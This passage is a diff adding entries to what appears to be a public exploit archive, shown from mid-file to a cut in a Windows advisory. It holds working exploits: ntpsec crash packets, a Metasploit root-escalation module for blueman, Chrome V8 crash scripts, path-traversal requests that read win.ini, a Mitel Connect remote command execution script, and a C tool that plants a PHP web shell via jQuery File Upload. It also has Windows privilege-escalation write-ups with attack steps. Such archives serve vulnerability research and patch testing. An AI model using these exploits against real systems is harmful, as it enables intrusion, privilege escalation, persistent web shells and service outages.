+       "\xd8\x80\x57\x9f")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.sendto(buf, ('127.0.0.1', 123))
--- a/exploits/linux/dos/46177.py
+++ b/exploits/linux/dos/46177.py
@ -0,0 +1,20 @@
+#!/usr/bin/env python
+# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
+# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
+# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
+# Website: https://dumpco.re/bugs/ntpsec-authed-npe 
+# Vendor Homepage: https://ntpsec.org/ 
+# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz 
+# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
+# CVE: CVE-2019-6445
+# Note: this PoC uses Keyid 1 with password 'gurka'
+
+import sys
+import socket
+
+buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
+       "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
+       "\x56\xc8\x07\xd4")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.sendto(buf, ('127.0.0.1', 123))
--- a/exploits/linux/dos/46178.py
+++ b/exploits/linux/dos/46178.py
@ -0,0 +1,49 @@
+#!/usr/bin/env python
+# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS
+# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
+# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
+# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite
+# Vendor Homepage: https://ntpsec.org/ 
+# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
+# Affected versions: all versions of ntpsec including, and prior to 1.1.2.
+# CVE: CVE-2019-6442
+# Note: this PoC uses Keyid 1 with password ‘gurka’
+
+import sys
+import socket
+
+buf = ("\x16\x08\x00\x03\x00\x00\x00\x00\x00\x00\x01\xd4\x6c\x65\x61\x6d" +
+       "\x3d\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
+       "\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x34\x41\x41\x42" +
+       "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41" +
+       "\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41" +
+       "\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
+       "\x42\x42\x42\x42\x42\x31\x32\x33\x34\x35\x3e\x37\x38\x39\x30\x31" +
+       "\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37" +
+       "\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d\x36\x33" +
+       "\x34\x35\x36\x37\x38\x39\x30\x31\x32\x38\x3d\x20\x2d\x36\x4a\x0a" +
+       "\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x0a\x34\x35\x36" +
+       "\x37\x38\x39\x0a\x0a\x0a\x26\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
+       "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a" +
+       "\x42\x42\x42\x54\x42\x42\x41\x41\x41\x34\x41\x41\x42\x42\x42\x42" +
+       "\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41" +
+       "\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a" +
+       "\x41\x41\x41\x41\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x25\x42" +
+       "\x42\x41\x41\x41\x0a\xae\x4a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x08" +
+       "\x0a\x2b\x0a\x0a\x0a\x34\x35\x36\x37\x38\x39\x0a\x0a\x0a\x26\x0a" +
+       "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
+       "\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a\x42\x42\x42\x54\x42\x42\x41\x41" +
+       "\x41\x34\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41" +
+       "\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a" +
+       "\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x41\x41\x41\x41\x57\x41\x42\x42" +
+       "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x0a\x42\x42\x42" +
+       "\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x41\x41\x41\x43" +
+       "\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a" +
+       "\x0a\x0a\x05\xff\xff\x05\x0a\x64\x1b\x0a\x0a\x0a\x2b\x0a\x0a\x0a" +
+       "\x0a\x0a\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\x34\x00\x00\x00" +
+       "\x80\x39\x30\x20\x32\x33\x34\x35\x36\x37\x38\x39\x30\x41\x5b\x41" +
+       "\x00\x00\x00\x01\x8f\x2c\x6e\x5b\x49\xe7\xa0\x78\xa1\x9b\x50\xf5" +
+       "\xb2\x18\x04\x00")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.sendto(buf, ('127.0.0.1', 123))
--- a/exploits/linux/local/46186.rb
+++ b/exploits/linux/local/46186.rb
@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'blueman set_dhcp_handler D-Bus Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges by exploiting a Python
+        code injection vulnerability in blueman versions prior to 2.0.3.
+
+        The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
+        `set_dhcp_handler` function which uses user input in a call to `eval`,
+        without sanitization, resulting in arbitrary code execution as root.
+
+        This module has been tested successfully with blueman version 1.23
+        on Debian 8 Jessie (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'the grugq', # Discovery and exploit
+          'bcoles'     # Metasploit
+        ],
+      'DisclosureDate' => '2015-12-18',
+      'References'     =>
+        [
+          ['BID', '79688'],
+          ['CVE', '2015-8612'],
+          ['URL', 'https://twitter.com/thegrugq/status/677809527882813440'],
+          ['URL', 'https://github.com/blueman-project/blueman/issues/416'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'],
+          ['URL', 'https://www.debian.org/security/2015/dsa-3427'],
+          ['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'],
+          ['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def dbus_send(dest:, type:, path:, interface:, contents:)
+    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
+  end
+
+  def check
+    unless command_exists? 'dbus-send'
+      vprint_error 'dbus-send is not installed. Exploitation will fail.'
+      return CheckCode::Safe
+    end
+    vprint_good 'dbus-send is installed'
+
+    res = dbus_send(
+      dest: 'org.blueman.Mechanism',
+      type: 'method_call',
+      path: '/',
+      interface: 'org.freedesktop.DBus.Introspectable.Introspect',
+      contents: ''
+    )
+
+    unless res.include? 'EnableNetwork'
+      vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available'
+      return CheckCode::Safe
+    end
+    vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'
+
+    res = execute_python('')
+    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
+      vprint_error 'Target is not vulnerable'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def execute_python(code)
+    dbus_send(
+      dest: 'org.blueman.Mechanism',
+      type: 'method_call',
+      path: '/',
+      interface: 'org.blueman.Mechanism.EnableNetwork',
+      contents: "'string:[]' 'string:[]' 'string:#{code}'"
+    )
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 10..15}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Executing payload...'
+    res = execute_python "os.system(\"#{payload_path}&\")"
+    vprint_line res
+
+    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
+      fail_with Failure::NotVulnerable, 'The target is not vulnerable'
+    end
+
+    if res.include? 'SyntaxError:'
+      fail_with Failure::Unknown, 'Payload execution failed due to syntax error'
+    end
+  end
+end
--- a/exploits/multiple/dos/46181.html
+++ b/exploits/multiple/dos/46181.html
@ -0,0 +1,34 @@
+<!--
+# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory in invalid array length. Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
+# Vendor Homepage: https://www.google.com/
+# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
+# Tested on: Windows x64
+# CVE : N/A
+
+# Description:
+
+# Fatal javascript OOM in invalid array length
+
+# https://bugs.chromium.org/p/v8/issues/detail?id=8668
+-->
+
+
+<html>
+<head>
+<script>
+
+function main() {
+
+var ar = [];
+
+	for(let i = 0; i < 0x20000000; ++i){
+		ar[i]=i;
+	} 
+}
+</script>
+</head>
+<body onload=main()></body>
+</html>
--- a/exploits/multiple/dos/46183.js
+++ b/exploits/multiple/dos/46183.js
@ -0,0 +1,58 @@
+/*
+The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.
+
+PoC:
+*/
+
+function gc() {
+    for (let i = 0; i < 10; i++) {
+        new ArrayBuffer(1024 * 1024 * 10);
+    }
+}
+
+function opt(arr) {
+    let r = /a/;
+    let o = {};
+
+    arr[0].charAt(0);
+    arr[1].charAt(0);
+    arr[2].charAt(0);
+    arr[3].charAt(0);
+    arr[4].charAt(0);
+    arr[5].charAt(0);
+    arr[6].charAt(0);
+    arr[7].charAt(0);
+    arr[8].charAt(0);
+    arr[8].charAt(0);
+    arr[9].charAt(0);
+
+    o.x = 'a'.match(r);
+
+    return o;
+}
+
+function main() {
+    for (let i = 0; i < 10000; i++) {
+        opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);
+    }
+
+    let a = 'a'.repeat(1024 * 1024 * 2);
+    let b = 'a'.repeat(1024 * 1024 * 2);
+
+    let arr = [];
+    for (let i = 0; i < 10; i++) {
+        arr[i] = a + b;
+    }
+
+    gc();
+
+    let o = opt(arr);
+
+    gc();
+
+    let tmp = [1234];
+
+    print(o.x);  // 1234
+}
+
+main();
--- a/exploits/php/webapps/46172.txt
+++ b/exploits/php/webapps/46172.txt
@ -0,0 +1,38 @@
+# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Download
+# Dork: N/A
+# Date: 2019-01-16
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.roxyfileman.com/
+# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php
+# Version: 1.4.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/fileman/php/download.php?f=/[PATH]/fileman/Uploads/[FILE]
+# 
+
+GET /[PATH]/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6; GeniXCMS-Installation=rsb95ndeo38fi0qo5376ku0o74; GeniXCMS-uxTCOmgGby9cYrSEFhS2=iuac7ooh77hghvbq7afkn0kl13; roxyld=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads; roxyview=list
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Tue, 15 Jan 2019 22:19:32 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Disposition: attachment; filename="win.ini"
+Content-Length: 564
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: application/force-download
--- a/exploits/php/webapps/46173.txt
+++ b/exploits/php/webapps/46173.txt
@ -0,0 +1,38 @@
+# Exploit Title: doorGets CMS 7.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 2019-01-16
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.doorgets.com/
+# Software Link: https://netix.dl.sourceforge.net/project/doorgets-cms/doorGets%20CMS%20V7/doorGets_CMS_V7.0.zip
+# Version: 7.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/fileman/php/download.php?f=/[PATH]/fileman/Uploads/[FILE]
+# 
+
+GET /[PATH]/fileman/php/download.php?f=%2FExploitDb%2FdoorGets_CMS_V7.0%2Ffileman%2FUploads%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6; GeniXCMS-Installation=rsb95ndeo38fi0qo5376ku0o74; GeniXCMS-uxTCOmgGby9cYrSEFhS2=iuac7ooh77hghvbq7afkn0kl13; roxyld=%2FExploitDb%2FdoorGets_CMS_V7.0%2Ffileman%2FUploads; roxyview=list
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Tue, 15 Jan 2019 22:03:21 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Disposition: attachment; filename="win.ini"
+Content-Length: 564
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/force-download
--- a/exploits/php/webapps/46174.txt
+++ b/exploits/php/webapps/46174.txt
@ -0,0 +1,66 @@
+# Exploit Title: ShoreTel / Mitel Connect ONSITE ST14.2 Remote Code Execution
+# Google Dork: +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0
+# Date: 01-01-2019
+# Exploit Author: twosevenzero
+# Vendor Homepage: https://www.mitel.com/
+# Version: 19.49.5200.0 (and very likely many others prior and after)
+# CVE : CVE-2018-5782 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5782)
+
+Description
+===========
+There are multiple vulnerabilities in ShoreTel/Mitel Connect ONSITE ST 14.2
+which, when chained together, result in remote code execution in the
+context of the running service. The vendor was contacted by Jared McLaren
+of SecureWorks in early 2018 but a proof of concept was not released. I had
+access to a single device during the development of this exploit. As such,
+your system paths may be different and you may need to edit this script to
+fit your needs.
+
+Solution
+========
+The vendor has released a response stating that the newest versions are not
+affected. Please see their response for upgrade instructions.
+
+https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0004
+
+#!/usr/bin/env ruby
+
+require "base64"
+require "methadone"
+require "faraday"
+
+include Methadone::Main
+include Methadone::CLILogging
+
+main do |base_url,command|
+
+  cmd_b64 = Base64.strict_encode64(command.strip)
+
+  conn = Faraday.new(:url => base_url.strip)
+  res = conn.get do |req|
+    req.url "/scripts/vsethost.php", 
+      {
+        :hostId => "system",
+        :keyCode => "base64_decode",
+        :meetingType => "{${gKeyCode}($gSessionDir)}",
+        :sessionDir => cmd_b64,
+        :swfServer => "{${gHostID}($gMeetingType)}",
+        :server => "exec",
+        :dir => "/usr/share/apache2/htdocs/wc2_deploy/scripts/"
+      }
+  end
+
+  rce = conn.get do |req|
+    req.url "/scripts/vmhost.php"
+  end
+
+  print rce.body.to_s
+end
+
+version       "0.1.0"
+description   "Shoretel/Mitel Connect Onsite ST 14.2 Remote Code Execution PoC"
+
+arg :base_url, "URL of vulnerable Connect Onsite ST 14.2 Installation."
+arg :command, "Command to run."
+
+go!
--- a/exploits/php/webapps/46182.py
+++ b/exploits/php/webapps/46182.py
@ -0,0 +1,103 @@
+# Exploit Title: Exploit for Blueimp's jQuery File Upload <= 9.22.0 CVE-2018-9206
+# Google Dork: inurl: /jquery-file-upload/server/php
+# Date: 1/15/2019
+# Exploit Author: Larry W. Cashdollar
+# Vendor Homepage: http://www.vapidlabs.com
+# Software Link: [download link if available]
+# Version: <= 9.22.0
+# Tested on: Linux
+# CVE : CVE-2018-9206
+
+
+/*Exploits CVE-2018-9206 to install a webshell.*/
+/*http://www.vapidlabs.com/advisory.php?v=204 */
+/*$ gcc main.c -o blue_exploit */
+/*Larry W. Cashdollar @_larry0*/
+
+#include <stdio.h>
+#include <sys/socket.h>
+#include <stdlib.h>
+#include <netinet/in.h>
+#include <string.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+#define BSIZE 1024
+#define DEBUG 1
+#define TESTONLY 0
+
+void build_string (char *p, char *path, char *arg, char *ar1, int func);
+
+int
+main (int argc, char *argv[])
+{
+  int sock = 0, bytes_read = 0, total = 0, function = 0;
+  struct sockaddr_in serv_addr;
+  char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
+
+  if (argc <= 1)
+    {
+      printf
+	("CVE-2018-9206 Exploit\n@_larry0\nUsage: %s hostname port path command\n",
+	argv[0]);
+      return (0);
+    }
+  if (argc == 5)
+    function = 1;
+  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
+    {
+      printf ("\nSocket creation error\n");
+      return (-1);
+    }
+
+  build_string (payload,argv[3] ,argv[1], argv[4], function);
+
+if (!TESTONLY){
+
+  memset (&serv_addr, 0, sizeof (serv_addr));
+
+  serv_addr.sin_family = AF_INET;
+  serv_addr.sin_port = htons (atoi (argv[2]));
+
+  if (inet_pton (AF_INET, argv[1], &serv_addr.sin_addr) <= 0)
+    {
+      printf ("\nInvalid address.\n");
+      return (-1);
+    }
+
+  if (connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)) < 0)
+    {
+      printf ("\nConnection Failed.\n");
+      return (-1);
+    }
+  send (sock, payload, strlen (payload), 0);
+}
+  if (DEBUG)
+    printf ("\nSending Payload:\n%s", payload);
+if (!TESTONLY) {
+  while (1)
+    {
+      bytes_read = recv (sock, buffer, BSIZE, 0);
+      total += bytes_read;
+      if (bytes_read <= 0)
+	break;
+      printf ("%s", buffer);
+      bzero (buffer, BSIZE);
+    }
+  printf ("\n[+] Total bytes read: %d\n", total);
+  close (sock);
+}
+  return (0);
+}
+
+
+void
+build_string (char *p, char *path,char *arg, char *ar1, int func)
+{
+  if (func)
+      snprintf (p, BSIZE,
+		"GET /%s/files/shell.php?cmd=%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\n\r\n", path,ar1, arg);
+  else
+    snprintf (p, BSIZE,
+	      "POST /%s/index.php HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\nContent-Length: 244\r\nContent-Type: multipart/form-data; boundary=------------------------c8e05c8871143853\r\n\r\n--------------------------c8e05c8871143853\r\nContent-Disposition: form-data; name=\"files\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $cmd=$_GET['cmd']; system($cmd);?>\r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
+}
--- a/exploits/windows/dos/46170.py
+++ b/exploits/windows/dos/46170.py
@ -0,0 +1,27 @@
+# Exploit Title: Spotify 1.0.96.181 - "Proxy configuration"  Denial of Service (PoC)
+# Discovery by: Aaron V. Hernandez
+# Discovery Date: 2019-01-15
+# Vendor Homepage: https://www.spotify.com
+# Software Link: https://www.spotify.com/mx/download/windows/
+# Tested Version: 1.0.96.181
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Home x64
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python Spotify_1.0.96.181.py
+# 2.- Open Spotify_1.0.96.181.txt and copy content to clipboard
+# 3.- Open Spotify.exe
+# 4.- Clic "Configuracion"
+# 5.- Select HTTP
+# 6.- Paste ClipBoard on "Host"
+# 7.- Clic "Actualizar proxy"
+# 8.- Type any user and password
+# 9.- "Iniciar sesion"
+# 10.- Crashed
+
+# !/usr/bin/env python
+
+buffer = "\x41" * 516544
+f = open("Spotify_1.0.96.181.txt", "w")
+f.write(buffer)
+f.close()
--- a/exploits/windows/dos/46184.txt
+++ b/exploits/windows/dos/46184.txt
@ -0,0 +1,72 @@
+Windows: RestrictedErrorInfo Unmarshal Section Handle UAF EoP
+Platform: Windows 10 1709/1809
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary:
+The WinRT RestrictedErrorInfo doesn’t correctly check the validity of a handle to a section object which results in closing an unrelated handle which can lead to EoP.
+
+Description:
+The RestrictedErrorInfo class is a COM object implemented internal to the COM runtime. It’s used to pass structured error information across WinRT apartment and process boundaries. For that reason it supports a custom marshaling protocol and as it’s part of the system infrastructure it also marked a system trusted marshaler. It can be sent to processes which explicitly prevent custom marshaling such as many system services as well as AppContainer processes. 
+
+To send larger amounts of information such as the stack trace (and perhaps for security reasons) the marshaler will insert the name of a section object as well as a handle to that object into the marshaled stream. As COM marshaling doesn’t directly support passing handles, at least without additional help, the unmarshal code opens the client process and duplicates a SYNCHRONIZE only handle to the section into that process. The presumed idea behind passing this handle is it can be used to verify the section name is not some arbitrary section object. This validation takes place in the following code:
+
+HRESULT CRestrictedError::ValidateHandle(
+  HANDLE hSection, const wchar_t *pszSectionName, unsigned int cchSectionName)
+{
+  if ( !hSection && !*pszSectionName )
+    return S_OK;
+  ULONG length;
+  NTSTATUS status = NtQueryObject(hSection, ObjectNameInformation, NULL, NULL, &length);
+  if (status == STATUS_INFO_LENGTH_MISMATCH )
+  {
+    PUNICODE_STRING name = malloc(length);
+    NtQueryObject(hSection, ObjectNameInformation, name, length, NULL);
+    ULONG total_length = name->Length / 2;
+      if (length < 60)
+        return E_INVALID_ARG;
+      LPWSTR str = name.Buffer[name->Length - 60 * 2];
+      if (wmemcmp(L"RestrictedErrorObject-", str, 22))
+        return E_INVALID_ARG;
+      size_t name_length  = wcslen(pszSectionName);
+      if (wmemcmp(pszSectionName, str, name_length))
+        return E_INVALID_ARG;
+      return S_OK;
+  }
+  return E_ERROR;
+}
+
+ValidateHandle takes the handle from the marshaled data and uses NtQueryObject to get its object name. This name, minus any leading name information is then compared against the passed in section name. If they’re not equal then this function fails and the section information is ignored. There’s two issues with this code, firstly it just checks the last 60 characters of the string matches “RestrictedErrorObject-” plus an arbitrary suffix. Secondly, and most importantly, it doesn’t verify that the handle is a section object, it just verifies the name. 
+
+This might not be a major issue except that once the handle is validated the code assumes ownership of the handle. Therefore once the code is finished with the handle, which can be in the unmarshaler or when the RestrictedErrorInfo object is released, the handle will be closed. If the handle is set to a pre-existing handle inside the unmarshaling process, as long as it meets the name requirements the handle will be closed and the handle entry opened for reuse. This can lead to a UAF on an arbitrary handle.
+
+One way of exploiting this would be to attack the BITS service which as demonstrated many times is a good privileged target for these sorts of attacks:
+
+1) Create a job writing a file to the path “C:\RestrictedErrorObject-PADDING\OUTPUT.TXT”. This results in BITS creating a temporary file “C:\RestrictedErrorObject-PADDING\BITSXXXX.tmp”. 
+2) Start the job and stall the GET request for the HTTP data, this is easy to do by requesting BITS downloads a URL from localhost and setting up a simple HTTP server.
+3) BITS now has an open, writable handle to the temporary file which the last 60 characters is of the form “RestrictedErrorObject-PADDING\BITSXXXX.tmp”.
+4 ) Marshal an error object, specifying the handle value for the temporary file (might have to brute force) and the section name using the name from 3. Send it to the BITS service using whatever mechanism is most appropriate. As the downloading is happening in a background thread the COM service is still accessible.
+5) The unmarshaler will verify the handle then close the handle. This results in the stalled download thread having a stale handle to the temporary file.
+6) Perform actions to replace the handle value with a different writable file, one which the user can’t normally write to.
+7) Complete the GET request to unblock the download thread, the BITS service will now write arbitrary data to the handle. 
+
+As the download thread will close the arbitrary handle, instead of 6 and 7 you could replace the handle with some other resource such as a token object and then get a UAF on a completely arbitrary handle type leading to other ways of exploiting the same bug.
+
+From a fixing perspective you really should do a better job of verifying that the handle is a section object, although even that wouldn’t be foolproof.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. Note that this doesn’t do an end to end exploit, it just demonstrates the bug in the same process as it’s a more reliable demonstration. This shouldn’t be a problem but if you really can’t see this is a security issue then… The PoC will create a file which will match the required naming pattern, then insert that into the marshaled data. The data will then be unmarshaled and the handle checked. Note that I release the COM object explicitly rather than waiting for the garbage collector as the handle is only released when the underlying COM object is released. For an attack on a native service this would not be necessary, but it’s mostly a quirk of using C#.
+
+1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
+2) Run the PoC.
+
+Expected Result:
+The unmarshal process should fail, or the handle is valid after the unmarshal process.
+
+Observed Result:
+The unmarshal process succeeds and the second call to obj.FullPath fails with an STATUS_INVALID_HANDLE error.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46184.zip
--- a/exploits/windows/local/46185.txt
+++ b/exploits/windows/local/46185.txt
@ -0,0 +1,74 @@
+Windows: XmlDocument Insecure Sharing Elevation of Privilege
+Platform: Windows 10 1809 (almost certainly earlier versions as well).
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): AppContainer Sandbox
+
+Summary: 
+
+A number of Partial Trust Windows Runtime classes expose the XmlDocument class across process boundaries to less privileged callers which in its current form can be used to elevate privileges and escape the Edge Content LPAC sandbox.
+
+Description:
+
+When an AppContainer sandboxed application creates a partial trust class it’s instantiated inside a Runtime Broker running at the normal user privilege. While Windows.Data.Xml.Dom.XmlDocument is marked as Base Trust so would be instantiated inside the same process as the creator, there’s a number of partial trust classes which expose a  XmlDocument object.
+
+An example of this is the ToastNotificationManager class which expose a XmlDocument through the GetTemplateContent static method. This is exposed to all normal AC and also has explicit permissions to allow lpacAppExperience capability to access it which all Edge Content LPAC processes have.
+
+The problem with XmlDocument is it doesn’t custom marshal the object over process boundaries, this means that the XmlDocument which is created by ToastNotificationManager stays in the Runtime Broker. If there’s any security issues with the use of XmlDocument interface then that’s a problem.
+
